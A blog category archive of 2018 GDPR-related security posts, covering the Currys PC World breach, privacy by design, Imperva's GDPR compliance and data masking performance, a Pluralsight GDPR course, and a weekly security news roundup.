Category Archives: GDPR

Latest on the Currys PC World Data Breach Impacting 10 Million Customers

Following further investigations, Currys PC World today confirmed 10 million of their customer personal details may have been stolen by hackers, a revised number from the 1.2 million customers and 5.9 million payment cards it advised back in June.

In June 2018, the company said there was "an attempt to compromise" 5.8 million credit and debit cards but only 105,000 cards without chip-and-pin protection had been leaked after hackers attempted access to company's payment processing systems.

The hack was said to have occurred nearly a year before it was disclosed, so it either went undetected, which is common where there is inadequate security monitoring in place, or the business knew about the breach but choose not to disclose it to their impacted customers.

The Information Commissioner's Office (ICO) fined the Dixons Carphone £400,000 for a data in 2015 breach, however, Currys PC World stated the incidents were not connected.

The business stressed it has now improved its security measures including enhanced controls, monitoring, and testing to safeguard customer information, and "trebling their investment in cybersecurity". Unfortunately, no details have been disclosed explaining how the hackers were able to access such large quantities of personal data. The company "security improvement" statement suggests their IT security was rather underfunded and not at a sufficient standard to adequately secure their business operations and customer data.

The ICO (statement) and the NCSC (statement) both have released statements in June about the breach. So we'll see what the ICO makes of it, but I think the business is likely to be fined again, although not the potentially massive GDPR penalties, as this data breach occurred before the GDPR came into force in May.

Customer statement by Currys PC World to their customers today

On June 13, we began to contact a number of our customers as a precaution after we found that some of our security systems had been accessed in the past using sophisticated malware.

We promptly launched an investigation. Since then we have been putting further security measures in place to safeguard customer information, increased our investment in cyber security and added additional controls. In all of this we have been working intensively with leading cyber security experts.

Our investigation, which is now nearing completion, has identified that approximately 10 million records containing personal data may have been accessed in 2017. This unauthorised access to data may include personal information such as name, address, phone number, date of birth and email address.

While there is now evidence that some of this data may have left our systems, these records do not contain payment card or bank account details and we have no confirmed instances of customers falling victim to fraud as a result. We are continuing to keep the relevant authorities updated.

As a precaution, we are letting our customers know to apologise and advise them of protective steps to take to minimise the risk of fraud. These include:

If you receive an unsolicited email, letter, text or phone call asking for personal information, never reveal any full passwords, login details or account numbers until you are certain of the identity of the person making the request. Please do not click on any links you do not recognise.

If you think you have been a victim of fraud you should report it to Action Fraud, the UK’s national fraud and internet crime reporting centre, on 0300 123 2040*.

We also recommend that people are vigilant against any suspicious activity on their bank accounts and contact their financial provider if they have concerns.
You can find more information here

We take the security of your data extremely seriously and have previously announced that we have taken action to close off this access and have no evidence it is continuing. Nevertheless, we felt it was important to let customers know as soon as possible.

We continue to make improvements and investments to our security systems and we’ve been working round the clock to put this right. We’re extremely sorry about what has happened – we’ve fallen short here. We want to reassure you that we are fully committed to protecting your data so that you can be confident that it is safe with us.

5 Ways Privacy by Design Can Rebuild Consumer Trust

Among the many requirements of the General Data Privacy Regulation (GDPR) is a directive to implement new systems of “privacy by design and default.” In this post-GDPR era, the practice may turn out to be more than a mandate. True privacy by design could be a timely opportunity to engage and empower customers.

According to an April 2018 survey by IBM and Harris Poll, 78 percent of U.S. respondents said that an organization’s data privacy capabilities are “extremely important,” while only 20 percent “completely trust” those companies whose products they use. The findings of a 2017 study by software corporation SAP found that 79 percent of consumers will disengage from a brand if their data is used without consent or knowledge.

These attitudes expose a vast opportunity in making the shift to security by design and default. Adopting transparency around data privacy practices could provide the chance to rebuild customer trust and develop lasting relationships.

What is Privacy by Design?

The concept of “privacy by design” was introduced by Ann Cavoukian in the 1990s. She presented outlining principles for proactively incorporating data protection into systems and operations from the ground up. It was imperative, she wrote in her paper, that privacy “become integral to organizational priorities, project objectives, design processes and planning operations.”

From the user’s perspective, according to Cavoukian, the organization is responsible for establishing “openness and transparency … relating to the management of personal information.” The privacy by design mandate in the GDPR was directly influenced by Cavoukian’s work.

Even beyond very costly GDPR fines, there’s enormous risk in failing to adopt secure design. According to a June 2018 Ponemon Institute study, 74 percent of IT security practitioners say it’s “likely” their company had a security incident in the last year because of their digital transformation processes.

The Key: Respect for the Individual

Openness and transparency would require a transition of practice and priority from meeting disclosure requirements to genuine education, including the adoption of language that makes sense to the user.

“Until now, the average consumer was likely unaware that when they ‘turn on cookies’ it means they are agreeing to share their information with dozens — and, in some cases, hundreds — of affiliated partners. Those days are over,” wrote Kevin Cochrane in the Harvard Business Review.

At the core of Cavoukian’s content on privacy by design is the concept of “respect for the individual.” Organizations are well-served to consider the role of UX design principles outlined in the international standard 13407 (revised to 9241 in 2015) from the International Standard Organization (ISO), in which a key goal identified is “empowering the user.”

When privacy by design is achieved in the enterprise, customers should feel confident about how personal data is used and kept secure, how artificial intelligence (AI)-based recommendations are generated and how to revoke personal data at any time.

Five Ways to Rebuild Customer Trust

With consumer trust at historic lows, chief information security officers (CISOs) should view privacy by design as more than just a regulatory directive. When put into practice, genuinely user-centric, privacy-focused design practices can provide the groundwork for meaningful customer relationships.

The following are examples of ways the enterprise can embrace the GDPR’s directive to adopt privacy-based design and make these business practices apparent to the public.

1. Adopt Smarter Identity and Access Management (IAM)

A key opportunity for organizations to reduce friction in their users’ experiences while improving data privacy is through the adoption of smarter solutions for IAM.

Eight out of 10 data breaches involve weak or stolen credentials, according to the 2017 Data Breach Investigations Report from Verizon, and password reuse remains an undisputed problem. Enabling trust-based access through interoperable credentials, biometrics and multi-factor authentication represents a shift in IAM practices — and it’s a viable solution to password fatigue.

2. Prioritize Risk-Aware Authentication

Consumers are increasingly aware of the risks of password-based authentication methodologies, according to a January 2018 study by IBM — their survey of 4,000 consumers’ priorities found that security ranked higher than convenience, especially when it relates to money-based applications.

Organizations who adopt risk-aware authentication solutions for user detection and new account creation may have an advantage when it comes to both customer trust and risk mitigation.

Read the complete IBM Study on The Future of Identity and Authentication

3. Emphasize Customer Benefits

When data is being collected for personalization algorithms, it’s imperative to educate the consumer on how data-sharing can improve their experience through continual customer education efforts built into the user experience.

An August 2017 study by Pegasystems on consumer attitudes toward AI found that 70 percent are open to AI if it can provide some distinct value, such as saving the customer money or time. However, 88 percent demand that businesses are “more open about where AI is currently being used while also showcasing how it improves the customer experience.”

4. Offer Value in Exchange for Data Shared

You don’t need to limit the value you provide the customer to brand-specific purchases. When possible, data shared by customers should provide value across brand interactions. For example, customers of VineSleuth are provided with free, on-demand access to their algorithmically-generated personal wine taste profiles to share with friends and inform wine purchases outside the app.

5. Provide On-Demand Access to Data

While GDPR Article 15 details the “[r]ight of access by the data subject,” brands should consider implementing on-demand access. Cochrane recommends the inclusion of tools for managing privacy and data sharing within customer applications. The in-app customer data privacy center could include the ability for the individual to review their consent, update specific data permissions and download the sum total of data shared at any time.

While many security leaders are struggling to gain footing and update processes in the post-GDPR era, it’s valuable to consider the customer’s perspective.

Enterprises which embrace the directive to practice privacy by design have an opportunity for more secure authentication and access management, meaningful customer education and better data privacy. The results will likely shift data-dependent organizations toward design practices which balance UX with privacy compliance, but also the opportunity to rebuild critical customer trust and relationships.

The post 5 Ways Privacy by Design Can Rebuild Consumer Trust appeared first on Security Intelligence.

Is Facebook Doing Really That Badly?

By Dmitriy Gurkovskiy, Chief Analyst at RoboMarkets Founded by Mark Zuckerberg in February 2004, Facebook (NASDAQ:FB) is the world’s largest social network. On Thursday, after the earnings report, Facebook stocks went down by almost 20%; the company’s revenue was higher compared to the previous quarter, but the report did not meet expectations. In fact, this happens quite […]

The post Is Facebook Doing Really That Badly? appeared first on Hacked: Hacking Finance.

Onwards and Upwards: Our GDPR Journey and Looking Ahead

At Imperva, our world revolves around data security, data protection, and data privacy.  From our newest recruits to the most seasoned members of the executive team, we believe that customer privacy is key.

For the better part of the last two years, Imperva has laid the foundation for our compliance with the EU General Data Protection Regulation (GDPR).  At roughly ninety pages with 173 recitals and 99 articles, it’s a massive regulation that fundamentally shifts the data privacy and data protection universe.

Also read: Monitoring Data & Data Access to Support Ongoing GDPR Compliance

We at Imperva are proud of what we’ve accomplished in this time.  As the lead for Imperva’s Privacy Office, I can candidly say that our success has been made possible only through the combined efforts of the entire organization. Thank you to our many Privacy Champions that have actively engaged within their departments and teams.

And a special thanks to our many critical internal partners, including our CMO David Gee, for his humorous evangelizing of data privacy initiatives, our Director of InfoSec, Noam Lang, our CIO, Bo Kim, who was also our first-ever privacy champion, and our CEO, Chris Hylen, for all having supported and prioritized data privacy initiatives within Imperva.

Just the beginning

Our work to comply with GDPR represents only the start of Imperva’s journey to protect, and to create products that protect the data privacy of our customers and their users.  Already, Imperva is proactively building on our GDPR work and looking to ‘infinity and beyond’. Part of that ‘beyond’ is our monitoring and preparation for other game-changing regulations such as the EU ePrivacy Regulation and California’s Consumer Protection Act.

A Successful Launch

Imperva has launched significant enhancements to our data privacy and data security programs and environments to account for new obligations under GDPR.

  • Governance: We have formalized and expanded the governance structure of the data privacy function within Imperva, including the creation of a dedicated Privacy Office.  This updated governance structure has been integrated into our annual third-party certification audits and reviews.
  • DPIAs:  We have expanded our standard internal Privacy Impact Assessment process to trigger additional Data Protection Impact Assessments when appropriate.
  • Security Environments: We have long maintained several common certification frameworks via third-party audits, including ISO 27001, the PCI Data Security Standard, and SOC 2 Type II reporting.  As part of ensuring that our robust environments remain secure, we mapped our GDPR infosec obligations to our existing control frameworks to ensure we meet all GDPR obligations on an ongoing basis.
  • Updated Privacy Notices:  We updated the privacy policies on our web properties to reflect the changes we’ve adopted under GDPR. Additionally, we’ve refreshed our cookie consent banners and cookie policies for those in the European Union.
  • Customer Agreements: In order to facilitate streamlined customer onboarding, we’ve created ready-to-sign Data Processing Agreements (DPAs) that provide details about what personal data an Imperva product or service collects in order to provide that service.  These DPAs utilize the controller-processor model clauses approved by the EU Commission and address customer concerns about how cross-border data transfers are GDPR-compliant.
  • Data Subject Requests: We’ve rolled out a new data subject request portal on our web properties.  Additionally, we’ve worked with each Imperva department to ensure smooth operational processing of data subject rights, including access, rectification, and erasure.

To Infinity

We here at Imperva have not been satisfied by merely meeting our obligations.  We are making data privacy a priority. As a security company, data privacy is mission critical.  It’s part of earning and maintaining the trust of our customers and employees.

Even Better Products: Our Product teams have worked hard to re-architect infrastructure to enable regional storage of logs.  This new feature makes compliance with GDPR far easier for customers or their subsidiaries operating primarily within a single geographic region by reducing cross-border data transfers.  Additionally, regional log storage enables genuine conformity with data localization and residence laws, such as those in China, Canada, Germany, Russia, and South Korea.

Embedded Privacy Champions: We’ve ramped up our program to embed mini privacy subject matter experts within each department. Today, three percent of our workforce are privacy champions thinking about how to protect your personal data. And that number is growing.

Privacy Guidance Down to Departments: The Privacy Office has worked with each department to create individual departmental policies and operational guidance to ensure that Imperva employees in every role know how to safeguard and protect personal data.

Vendor Management: We’ve reviewed dozens of vendors across all product lines to ensure we have the appropriate data privacy and security provisions, data processing agreements, and standards in place to safeguard our customers’ personal data.  Our subprocessors page on our web properties provides additional information about third-party service providers.

And Beyond!

Imperva has aimed high when it comes to the obligations created by GDPR, but we’re also looking far beyond.

In particular, Imperva is keeping a close eye on new data privacy laws and updates coming down the line that could impact our customers’ data privacy obligations, and therefore our obligations to you—such as the EU ePrivacy Regulation, which updates the 2009 ePrivacy Directive, as well as the California Consumer Privacy Act, which becomes enforceable on January 1, 2020.

GDPR is a significant milestone in the data privacy universe and so too in Imperva’s journey, yet it’s important to recognize it as a milestone and not as an endpoint.  GDPR represents only the start of Imperva’s journey to protect and to create products that protect the data privacy of our customers and their users.

Achieving compliance: GDPR, CCPA and beyond

AB 375, or the California Consumer Privacy Act (CCPA) of 2018, was signed into law by California Governor, Jerry Brownon, on June 28, 2018 and is recognized as one of the toughest privacy laws in the U.S. The statute requires companies to disclose to California residents what information is being collected on them and how it will be used. Companies have 18-months to prepare for this new law to go into effect; it’s set to … More

The post Achieving compliance: GDPR, CCPA and beyond appeared first on Help Net Security.

How rogue data puts organisations at risk of GDPR noncompliance

The GDPR compliance deadline came in by force on 25th May 2018 and applies to all organisations processing and holding the personal information of data subjects. This includes contacts such as customers, partners and patients. Much has been written about the immense efforts of organisations to improve their data privacy procedures in order to comply with GDPR, but there is a largely undiscussed oversight lurking just under the surface which, if left unaddressed, still leaves … More

The post How rogue data puts organisations at risk of GDPR noncompliance appeared first on Help Net Security.

The New Age of Accountability

The EU has been busy in the cybersecurity department, and for good reason. Given Europe’s ever-rising cybercrime rates, a new approach to data protection was in order. This cued the

The post The New Age of Accountability appeared first on The Cyber Security Place.

It’s time to relook at, rethink and then restructure our fragmented IT security landscape

GDPR and the NIS Directive present the perfect opportunity to eliminate tool bloat at your organisation. The run-up to Brexit has led to a boost in wages for professionals of

The post It’s time to relook at, rethink and then restructure our fragmented IT security landscape appeared first on The Cyber Security Place.

GDPR has made life easier for cyberciminals

Removal of PII data from Whois records makes protecting Internet users increasingly difficult for security professionals. New research conducted by domain name and DNS-based cyber threat intelligence firm DomainTools has revealed that

The post GDPR has made life easier for cyberciminals appeared first on The Cyber Security Place.

Five network security threats facing retail – and how to fight them

Digital networks are now the backbone of every retail operation. But they are also a very attractive target for cyber criminals. Paul Leybourne of Vodat International examines the key cyber

The post Five network security threats facing retail – and how to fight them appeared first on The Cyber Security Place.

Digital Strategy Isn’t Meeting Security Needs — Here’s What to Do

We are in the midst of a digital transformation. And yet, IT departments are struggling to develop a digital strategy that addresses data privacy and cybersecurity. In a world where the General Data Protection Regulation (GDPR) is now in effect, the lack of such a strategy could end up coming back to haunt your organization and its leadership.

The Greatest Challenge Facing Digital Strategy Leadership

According to a June 2018 Harvey Nash/KPMG CIO Survey, the greatest challenge facing security and information technology leadership is the ability to deliver dynamic data while simultaneously providing a high level of security and privacy.

Only 32 percent of organizations have a company-wide digital strategy, the same survey found, and of those, 78 percent admit that the strategy in place is moderately effective at best. These insights imply that all of the data transmitted through organizations, including the personal information of customers, isn’t getting the level of protection necessary or satisfying GDPR compliance.

Jumping Into the Digital Transformation Too Fast

Let’s face it, most companies are failing or falling behind when it comes to cybersecurity — and the ongoing digital transformation is only exacerbating the situation. The Harvey Nash/KPMG survey states IT departments are doing fine when it comes to traditional technologies, but it also recognizes the increasing complexity that digital technologies bring to organizations.

Understanding these technologies is part of the problem — not only how they work, but also how they’ll best improve the nature of the business. It might be tempting to apply the latest and greatest available technology, whether you need it or not.

IT staff are often risk-takers — they like new technology and want to use it right away. Where they run into trouble is bringing in the latest technology without a real strategy to implement it both wisely and securely. Just because IT wants to update its technology doesn’t mean the company is ready for it.

Too Much Data, Not Enough Security

Understanding how a technology’s abilities intersect (or don’t) with a business’s needs makes the difference between a successful transformation and digital nightmare. Whether the technology is a boon or bust for the company, there is one thing it is guaranteed to do: generate more data — which will require layers of security. Without an effective digital strategy, understanding and protecting that data becomes problematic.

If the data were stored in one location, it might be easier to manage. But with increasing diversity of technologies, from the Internet of Things (IoT) and cloud computing to blockchain and virtual reality (VR), databases for one company are stored in thousands of endpoints. This reality is leading to increased risk of data breaches.

“[W]ith the emergence of these transformative technologies the perimeter has become dynamic and ever-changing,” wrote Peter Galvin, chief strategy and marketing officer at Thales eSecurity. “[W]hile protecting the perimeter is still important, it simply is not enough to prevent sensitive data from being stolen.”

Getting Leadership on Board

A strong digital strategy will provide the layers of security and privacy needed in the digital transformation, but this requires cooperation from all levels of leadership. Just as IT departments have a responsibility to be more business-aware and recognize how new technologies fit (or don’t fit) into corporate strategies, boards of directors must be more realistic about creating digital strategies that will meet today’s and tomorrow’s privacy concerns.

In the past, the fallout from data breaches and other security incidents fell directly on C-suite employees: Chief executive officers (CEOs), chief information officers (CIOs) and chief information security officers (CISOs) have been held accountable by directors. However, the responsibility often falls on the board to approve budgets, support cybersecurity funding and efforts and create corporate strategies.

Thanks to GDPR — and rising security and privacy threats — boards may finally be getting the message. The Harvey Nash/KPMG survey found that boardrooms are increasingly prioritizing security. In fact, security has received the most significant increase in business priority over the past year.

And according to Board Effect, more boards are expanding to bring cybersecurity experts directly to the table as full members.

“Cybersecurity experts on the board have the proper expertise to advise the board about the best tools, processes and resources to keep hackers at bay,” the publication stated. “In addition, cybersecurity experts are the prime resource people for identifying new developments in IT as technology advances.”

This shift is promising for security professionals. With a digital perspective integrated directly into board decisions, IT departments should gain the leverage necessary to lobby for tools and support they need to meet the digital transformation with an adequate strategy to keep data secure.

Read the study from Ponemon Institute: Bridging the Digital Transformation Divide

The post Digital Strategy Isn’t Meeting Security Needs — Here’s What to Do appeared first on Security Intelligence.

GDPR Hurts Security but Publicity Might Help

A survey of 900 security professionals conducted by AlienVault at Infosecurity Europe found that spending on GDPR compliance efforts has hindered threat detection but cybersecurity publicity might actually benefit the industry. Additionally,

The post GDPR Hurts Security but Publicity Might Help appeared first on The Cyber Security Place.

New Pluralsight Course: The State of GDPR – Common Questions and Misperceptions

Presently sponsored by: Matchlight by Terbium Labs: Know when your exact data appears on the dark web. Contact us for a demo today.

New Pluralsight Course: The State of GDPR - Common Questions and Misperceptions

I love so many of the underlying principles of GDPR as it relates to protecting our personal data. I love the idea of us providing it for a specific purpose and it not being used beyond that. I love that it seeks to give us more control over access to (and erasure of) our data. I also love that the regulation has the potential to seriously bite organisations that don't protect it. You'd be hard pressed to find anyone who disagrees with any of that.

However, there are many things I dislike about the narrative around GDPR. I dislike the confusion around so many aspects of the regs. I dislike the barrage of emails I got as we approached (and passed) May 25. And I especially dislike the aggressiveness with which so many people have pushed their interpretation of it. It's almost as if GDPR is being used as weapon to attack rather than a tool to protect - let me give you a perfect example:

In the final days before the regs hit, Ghostery was trying their utmost to do the right thing yet somehow committed that cardinal sin so many of us have come close to doing before - putting all the recipients in the "to" line instead of "bcc":

An honest (and highly embarrassing) mistake no doubt, but how did a bunch of people react? By jumping up and down and claiming that Ghostery would now be hit with a €20M fine (or 4% of gross annual worldwide turnover, should that be a larger number). Most rational people with an inkling of common sense would know that's simply not going to happen; an organisation making a simple mistake whilst trying to do the right thing and than handling the subsequent communications in an ethical and responsible fashion is not going to get hit with the full whack of GDPR reserved for the worst offenders.

Here's another one which invoked a similar set of GDPR-related commentary:

After the ViewFines data breach, I had a number of people flagging the South African company's GDPR obligations. Yes, they're well and truly outside of the EU but hey, they could have some Europeans' data in there ergo they'll be pinged under GDPR, right? But think it through: here we have company operating in a (very) foreign jurisdiction whose sole purpose is to process traffic fines. You have to be in the country for them to have your data end up in their system! And just before you shout "but extraterritoriality", it's not just whether a legal provision exists (it does), there's the very important question of whether it has any chance of being enforced. Will a regulatory authority in the EU be able to successfully take action against a company in South Africa if, say, someone from France went on a holiday there and copped themselves a speeding fine? What does common sense tell you?

Which brings me to the new course and I put precisely this question to John Elliott whilst in London last month, only a couple of weeks after GDPR had hit. I've known John for a while via Pluralsight channels and we recorded 2 courses together that day, this one and another I'll announce after it goes live. John is the best possible person I could think of to create a course of this nature: he's a qualified Data Protection Officer for one of Europe's largest brands, has a privacy degree and also an infosec background. Plus - and this is the really critical bit - he explains GDPR in a way that makes sense! I expressed my dismay earlier on at how difficult so many people seem to be making a regulation that has such commendable objectives but every time I speak to John about it, he cuts right through to the point and makes it dead simple to understand in ways I've just not seen anyone do before.

New Pluralsight Course: The State of GDPR - Common Questions and Misperceptions

We talk specifically about cases like ViewFines and a rental car company in New Zealand. We cover how media outlets have been blocking folks from the EU and look at the way various organisations have been tackling their privacy policies. Of course, we also talk about penalties too and what levels will likely apply in what cases, plus how they'll be enforced in jurisdictions outside the EU too. John also has some great resources to help people understand GDPR and indeed some really neat examples of where communication has been done exceptionally well.

Lastly, as I mentioned last week, I've also formally engaged John to help ensure Have I Been Pwned complies with GDPR. Some things are trivial (in fact, things that I didn't expect would be) and other things require more work. It's a significant investment on my behalf to do this too but I honestly couldn't think of anyone better than John to do it. I'll share a heap more information later on, I'm sure you'll get a bit of a sense of some of the approaches we'll be taking after listening to John in this video.

We wanted to produce this course now - after GDPR was in action - so that we could have a narrative on what we're learning since it's come into effect. There's a million resources telling everyone all the things they should and should not do (and a good whack of those disagreeing with each other too), this course is a fresh take on things and is far more focused on what's actually happening than it is speculating how the regs will be enforced.

The State of GDPR: Common Questions and Misperceptions is now live on Pluralsight!

Only 20% of companies have fully completed their GDPR implementations

Key findings from a survey conducted by Dimensional Research highlight that only 20% of companies surveyed believe they are GDPR compliant, while 53% are in the implementation phase and 27% have not yet started their implementation. EU (excluding UK) companies are further along, with 27% reporting they are compliant, versus 12% in the U.S. and 21% in the UK. While many companies have significant work to do, 74% expect to be compliant by the end … More

The post Only 20% of companies have fully completed their GDPR implementations appeared first on Help Net Security.

Need for Speed: Optimizing Data Masking Performance and Providing Secure Data for DevOps Users

Let’s start with a pretty common life experience — you identify a need (e.g., transportation), you evaluate your options (e.g., evaluate car manufacturers, various features, pricing, etc.), and you decide to purchase (e.g., vehicle X). This process repeats itself over and over again regardless of the purchase. What typically happens following the purchase decision is also equally likely and transferrable — that is: How do I improve it? Increase efficiency? Can I tailor it to my individual needs?

For most technology purchases, including those related to data security — and data masking in particular — the analogy holds equally true. For many of our data security customers, the desire to optimize the through-put, run-rate, or outputs from the solutions they invest in is becoming increasingly important as they race to achieve regulatory compliance with key data privacy requirements and regulations such as the European (EU)-wide General Data Protection Regulation (GDPR), HIPAA, or PCI-DSS. Equally important is that most organizations are looking to mitigate the risk of sensitive data exposure and optimize their DevOps function; allowing more end-users to access data for test and development functions, without the risk associated with using sensitive data. And, they want all this to be achieved FASTER.

Imperva offers a variety of data security solutions to support these increasingly common organizational challenges, including Imperva Camouflage. Our industry-leading data masking solution and best practice implementation process offer a one-stop means to achieve compliance support and reduce data risks in DevOps, while meeting end-user processing expectations. Simply put: the process involves the use of a production database copy, upon which the data is classified for masking, and transformation algorithms are then applied to produce fictional — but contextually accurate — data that is substituted for the original source data; all done in an expeditious manner to meet the need for speed.

You’ve decided you need data masking, but your end-users want more

In previous blogs and webinars, we highlighted the value that data masking provides for protecting data privacy and supporting industry and regulatory compliance initiatives. Industry analysts continue to see ongoing and expanding use cases and demand for the technology. This is largely due to the fact that organizational data capture and storage of data, and sensitive customer data, in particular, continues to grow. Further, changing data applications; database types, migration to the cloud (for DevOps), privacy regulations required for de-identified data, and the growth of big data applications and various data use cases all combine to drive the added need for data masking technologies and their diversification and advancement.

So, organizations are seeing the value of data masking, and many have implemented it into their overall data security strategies to provide yet another critical layer. That said, they are also demanding increased speed of masked copy processing and provisioning to ensure their DevOps teams continue to deliver on business-critical processes. How then can data masking be optimized? Let’s first take a look at typical performance considerations, and then review how the process can be optimized for end-users.

How do you measure data masking ‘performance’?

One of the most common questions asked during a sales cycle, POC or implementation relates to the length of time it will take to mask data, and how that performance is measured. The quick answer is ‘it’s complicated’. Data Masking run-rate performance is typically measured in rows per second. This is the metric most often cited by our customers, but the underlying size of a row can and does vary significantly depending on how wide the particular tables are, therefore impacting performance comparison.

Additionally, the variance in data volumes and data model complexity make it challenging to provide specific performance numbers; but these are batch processes that modify large amounts of data (excepting discovery) and therefore consume a significant amount of time for large amounts of data. That said, Imperva offers a number of avenues to optimize performance for a given customer/client’s requirements and can be reverse engineered in most cases to achieve the desired performance or run-time metric. We’ll get into the specifics on this shortly.

Aside from the inherent capabilities of the software solution itself, there are several factors that influence the performance of data masking that we discuss with our customers. We also explain that the various combination of these make it challenging for any vendor to pinpoint exact masking run times. We’ve consolidated the performance-impacting variables into three key variables, including database characteristics, hardware requirements, and masking configurations. Let’s review each of these:

  1. Database characteristics:

In general, a large database takes longer to mask than a small database- pretty simple! To be more specific the height and width (row count and columns per row) of the tables in the database being masked directly impact the runtime. Tall tables, with high row counts, have more data elements to process compared to shorter tables.

In contrast, wide tables containing extraneous non-sensitive information introduces I/O overhead throughout the data transformation process because the non-sensitive information is included, in part, during the data transformation process. This makes the input of the DevOps SME’s key to assessing the underlying databases and helping scope the performance requirements.

  1. Hardware Requirements:

Data masking can be a relatively heavy process on the database tier in that it copies and moves a significant amount of data in many cases. As we employ our best practice implementation process using a secure staging server, this introduces yet another variable that influences through-put- but also an opportunity. The processing power and I/O speed on the database staging tier greatly influence the performance- regardless of vendor or solution being deployed. When we provide base hardware specifications to customers for the staging server, we make this clear. We also help by providing a range of hardware options required depending on the underlying environment characteristics and end-user requirements- noting that where SLA windows are tight for masking then appropriate hardware should be provisioned to accommodate accordingly. The good news is that this is an easy configuration, and most customers already have access to all the tools they need to maximize their staging server to their specific requirements.

  1. Masking Configurations within the projects:

The details of the security and data masking requirements, which are driven by the organization, also influence performance. In particular, the amount and complexity of the masking being applied have an impact on masking run times. From our experience, in cases where typical sensitive data element types require masking, the data resides in 15% – 20% of the tables. If higher security requirements are imposed and additional data elements are included, this could expand to include as many as 30% – 40% of the tables.

In addition to the volume of data being masked, the specific data transformations also influence the runtimes.  There are different types of data transformers, and they each have different performance characteristics based on the manner in which they manipulate data. For example, ‘Data Generators’ synthesize fictitious numbers such as Credit Cards and Phone numbers, whereas, ‘Data Loaders’ load data such as shuffling names and addresses from defined sets. The business needs usually dictate which transformer should be used for a given data element, but sometimes the business requirement can be met with one or more transformers. In those cases, the option chosen can have an impact on performance.

For each of these key variables, it’s important to assess the business requirements and then balance appropriately with regards to the complexity of the underlying data model, the staging server horsepower, and the methods applied for the masking process. Imperva’s depth of experience in this regard provides additional value to customers when they are looking to understand the best implementation approach to meet both data security and end-user requirements. It’s a critical piece of the puzzle.

We know what impacts performance and what to consider beforehand. Now, how do we make it even better?

While we’ve focused on the more tool-agnostic variables that impact masking performance, there are also considerations within the tool itself that can help fine-tune the end result. For Imperva’s solution, there are a variety of levers that can be used to customize and optimize high-volume/high-throughput masking. For example, performance settings within the solution can be adjusted at multiple levels of the application stack including (a) the database server, (b) the Imperva Camouflage application server, and (c) within the masking engine itself to maximize performance. Settings for parallelization of operations, flexible allocation of hardware resources (RAM) and the use of bulk-SQL commands during masking operations, are some of the ways in which the performance and scalability of the Imperva Camouflage solution can also be configured.

A number of approaches for maximum scalability and performance are also available within the Imperva Camouflage solution that can be considered depending on the environment and requirements, including:

  • Multi-Threading – parallelization is used throughout Imperva Camouflage to enable masking to scale to the largest of databases and masking targets. This includes the capability to process many database columns at the same time while accounting for dependencies within certain databases.
  • Optimized SQL – although invisible to the user, Imperva Camouflage refines the SQL used to affect the masking depending on the database type as well as the particular masking operation being performed. No configuration changes are necessary to take advantage of bulk-SQL and other commands that minimize database logging overhead.
  • Execution on the Database Tier – many operations are performed directly on the database server(s) which has the effect of minimizing data movement over the network thereby maximizing performance. It also leverages the hardware resources that are typically dedicated to database servers.
  • Parallelization on the Database Tier – wherever possible, operations are performed in parallel using multiple instances on the database tier as well. For some environments, this is a combination of database engine settings as well as Imperva Camouflage configuration. By scaling up or down, the masking process can be made to conform to the needs/constraints of the given masking operation. This is one area that Imperva typically spends time with its customer’s and masking end users to ensure they are maximizing the tool’s performance.

It’s also important to reinforce that regardless of the solution, the storage architecture and configuration have a significant impact on performance. Faster storage with reads/writes spread across multiple disks will result in better performance overall. In many cases, database and storage tiers are configured for transactional workloads which are different from the bulk/batch workload that masking represents. Better performance will be found with faster storage that is in the same data center as the database server being masked, period!

Slow down to Speed up!

So, there are clearly a variety of factors that impact the run-rate of data masking, and yet there are a variety of levels (once understood) that can be unpacked of to optimize performance and achieve end-user expectations. Additionally, leveraging industry-recognized, purpose-built solutions and best-practice implementation expertise offers a much more efficient and effective way to optimize data masking run-rates; and offers a more scalable and sustainable process over the long-term.

The key is to slow down during the implementation phase. Understand your requirements. Understand your data model. Understand what resources you need to apply to your staging server and your masking processes, and you’re well on your way to optimizing the resulting output. At the end of the day, Imperva can in most cases reverse engineer a customer’s desired performance requirements and configure the solution, processes, and recommended hosting architecture to achieve the desired result.

Imperva offers a variety of data security solutions to support organizational data security efforts, with Imperva Camouflage offering industry-leading support for masking (and/or pseudonymizing) data to help achieve privacy compliance requirements (e.g., GDPR) and mitigate the risk of a costly data breach within the various DevOps environments.

Get in touch to learn more about Imperva Camouflage and Imperva’s broader portfolio of data security solutions. Also, feel free to test-drive SCUBA, our free database vulnerability scanner tool, and/or CLASSIFIER, our free data classification tool.

This Week in Security News: Bloomingdale’s and Claudette

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, Timehop, Macy’s, Bloomingdale’s, and Domain Factory announce a system-wide breach. Also, a new AI tool, Claudette, is holding tech companies accountable for GDPR compliance.

Read on to learn more. 

Zero Day Initiative: A 1H2018 Recap

Now in its thirteenth year, the ZDI manages the largest vendor-agnostic bug bounty program in the world with over 3,500 external researchers.


Timehop Breach: U.S. Company Navigates Europe’s New Data Privacy Rules

Timehop – one of the first U.S. companies to suffer a major breach under GDPR – rushed to issue a report under the 72-hour deadline failed to report the full extent of information that was compromised.

Building a Profitable Security Services Offering Part 2 IT Security Features and Benefits Overview

Trend Micro is excited to partner with SPC International in this 5-part Blog, Webinar and Online Training Series; focused on Building a Profitable Security Services Offering for MSP Partners.

Notorious ‘Hijack Factory’ Shunned from Web

Bitcanal, a Portuguese web-hosting firm accused of helping spammers hijack dormant internet address space over the years, was kicked off the internet after multiple bandwidth providers severed ties.

How the Industry 4.0 Era Will Change the Cybersecurity Landscape

While enterprises work to enhance their efficiency, customer experience, logistics, and supply chains through IoT, their malicious counterparts may be expending just as much to undermine their efforts.

$660,000 Data Privacy Fine Highlights Dangers for Businesses Dabbling in Politics

The U.K. Information Commissioner’s Office is criminally prosecuting companies that have shared data with political parties, as well as giving them a $660,000 fine.

Check Your Accounts: Timehop, Macy’s, Bloomingdale’s, Domain Factory Announce Breach

Smartphone app Timehop, retailers Macy’s and sister company Bloomingdale’s, and Germany-based hosting provider Domain Factory announced that their systems were breached.

Macy’s Customer Credit Data Hacked In Breach

Data intruders accessed the names and passwords of some Macy’s customers and may have gained access to their credit card numbers and expiration dates, though not their four-digit security codes.

Keeping the Lights On: A Look at the EU’s Network and Information Security (NIS) Directive

The NIS is an EU-wide cybersecurity legislation that is meant to improve the cybersecurity of the critical utility and digital services industries, minimizing risk to essential processes and operations.

ZDI Reports Rise in Security Vulnerability Disclosures

Through the first six months of the year, ZDI has already published 600 security advisories, which is 33 percent more advisories than in the first half of 2017. 

A New AI Evaluates the GDPR Compliance of Top Tech Companies

